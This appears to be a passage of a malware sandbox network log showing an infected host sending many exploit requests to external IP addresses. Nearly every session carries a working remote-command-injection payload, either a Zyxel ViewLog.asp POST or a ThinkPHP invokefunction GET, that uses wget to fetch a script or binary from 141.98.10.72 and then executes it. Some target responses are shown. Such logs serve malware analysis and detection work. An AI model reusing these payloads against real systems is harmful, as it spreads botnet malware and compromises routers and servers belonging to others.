Feb 14, 2024 09:30:56.528233051 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
926	192.168.2.15	45544	94.121.153.32	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.529443979 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
927	192.168.2.15	40270	31.200.54.175	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.529566050 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
928	192.168.2.15	35422	94.121.40.42	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.531040907 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
929	192.168.2.15	45988	31.44.136.209	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.535346031 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
930	192.168.2.15	52676	31.220.76.146	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.051281929 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:00.183609009 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
931	192.168.2.15	52470	95.244.23.131	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.051301003 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:00.183609009 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:00.401612043 CET	1286	IN	HTTP/1.0 404 Not Found Server: http server 1.0 Content-type: text/html Date: Wed, 14 Feb 2024 08:30:59 GMT Last-modified: Wed, 14 Feb 2024 08:30:59 GMT Accept-Ranges: bytes Connection: close Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 46 46 46 20 75 72 6c 28 27 2f 63 67 69 2d 62 69 6e 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 2f 65 72 72 5f 62 67 2e 6a 70 67 27 29 3b 0a 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 6c 69 6e 6b 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 76 69 73 69 74 65 64 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 31 7b 0a 77 69 64 74 68 3a 20 39 38 30 70 78 3b 0a 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 42 43 42 43 42 43 3b 0a 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 5f 69 6d 67 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Cache-Control" content="no-cache" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><link rel="shortcut icon" href="/images/favicon.gif" type="image/gif" /><link rel="icon" href="/images/favicon.gif" type="image/gif" /><style type="text/css">body{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;background: #FFFFFF url('/cgi-bin/images/error/err_bg.jpg');overflow: hidden;color: #A4A3A3;text-align: center;}.qnap_hyperlink a,.qnap_hyperlink a:link,.qnap_hyperlink a:visited{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;color: #A4A3A3;}.qnap_bar1{width: 980px;border-bottom: 1px solid #BCBCBC;padding-top: 10px;text-align: left;margin: 0 auto;}.qnap_bar_img{padding-bottom:

Session ID	Source IP	Source Port	Destination IP	Destination Port
932	192.168.2.15	42350	95.84.240.141	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.052349091 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:00.247502089 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
933	192.168.2.15	49860	94.123.16.166	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.074071884 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
934	192.168.2.15	38374	94.121.177.86	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.074955940 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
935	192.168.2.15	41012	112.186.69.72	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.252865076 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:59.539789915 CET	450	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 15 Jan 2014 16:48:02 GMT Location: https://localhost.kornet/index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' Connection: close Content-Type: text/html Content-Length: 56 Data Raw: 3c 48 54 4d 4c 3e 3c 42 4f 44 59 3e 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <HTML><BODY><H1>301 Moved Permanently</H1></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
936	192.168.2.15	59798	112.186.20.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.252996922 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
937	192.168.2.15	48168	94.46.22.125	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.261823893 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:01.383502007 CET	386	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 14 Feb 2024 08:30:59 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-transform, no-cache, no-store, must-revalidate X-Redirect-By: WordPress Location: http://192.168.0.14/cgi-bin/ViewLog.asp Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
938	192.168.2.15	48674	62.78.62.34	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.309571028 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
939	192.168.2.15	47592	94.121.18.169	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.321532011 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
940	192.168.2.15	44290	94.121.45.95	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.321655035 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
941	192.168.2.15	40682	31.200.25.13	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.321887016 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
942	192.168.2.15	48262	94.121.183.214	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.323376894 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
943	192.168.2.15	58512	95.100.66.166	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.454642057 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:59.655299902 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:59 GMT Date: Wed, 14 Feb 2024 08:30:59 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 65 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 39 26 23 34 36 3b 35 66 32 38 31 62 66 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.be7a7b5c.1707899459.5f281bf4</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
944	192.168.2.15	53772	95.211.212.40	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.478487968 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:59.703999996 CET	355	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Wed, 14 Feb 2024 08:30:59 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
